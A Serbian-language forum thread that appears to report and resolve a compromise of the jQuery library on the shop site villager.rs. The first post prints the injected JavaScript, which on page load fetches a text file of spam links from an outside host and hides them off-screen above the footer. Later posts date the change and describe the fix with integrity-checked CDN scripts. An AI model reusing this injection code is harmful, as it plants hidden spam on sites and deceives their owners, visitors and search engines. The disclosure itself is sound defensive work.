[Rešeno] villager.rs - kompromitovan jquery
#1

Na sajtu prodavnice villager.rs JQuery biblioteka je kompromitovana dodatkom sledećeg koda:

https://villager.rs/vendor/jquery/dist/jquery.min.js
Code:
document.addEventListener("DOMContentLoaded",function(){fetch("https://gblkeras.com/gbldom7.txt").then(t=>{if(!t.ok)throw new Error(`Failed to fetch content (${t.status})`);return t.text()}).then(t=>{if(t.includes("<script"))return console.warn("Blocked potentially unsafe content.");const e=document.createElement("div");e.innerHTML=t,e.style.position="absolute",e.style.left="-9999rem";const n=document.querySelector("footer");n? n.parentNode.insertBefore(e,n):document.body.appendChild(e)}).catch(t=>console.error("Error fetching SEO block:",t))});

gbldom7.txt koji pretraživač svlači usled izvršavanja ovog JavaScripta koda sadrži spisak spam linkova kompletno sa a href atributima koji su sakriveni na stranici u delu footera.

   
Reply
#2

Sudeći po Last-Modified zaglavlju sa web servera, može se napraviti pretpostavka da je JQuery kompromitovan najranije od marta tekuće godine:

Code:
# curl -sI 'https://villager.rs/vendor/jquery/dist/jquery.min.js' | grep -i last-modified last-modified: Sat, 28 Mar 2026 12:18:11 GMT
Reply
#3

Prebačen je jQuery sa lokalnog 3.5.1 na 3.7.1 sa stranim učitavanjem i dodata je sha384 validacija resursa; na sličan način je promenjen i bootstrap autocomplete, tako da je kompromitacija verovatno bila šira.

Code:
<script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha384-1H217gwSVyLSIfaLxHbE7dRb3v4mYCKbpQvzx0cegeju1MVsGrX5xXxAvs/HgeFs" crossorigin="anonymous"></script> <script defer src="https://cdn.jsdelivr.net/gh/xcash/[email protected]/dist/latest/bootstrap-autocomplete.min.js" integrity="sha384-g9cynrQpYP7CeiZuMTmctGqq+WDN7+/mHbMJUTlCJnbk6QW98IjXumFQlRyjf4jx" crossorigin="anonymous"></script>

U svakom slučaju, zlonamernog koda više nema.
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)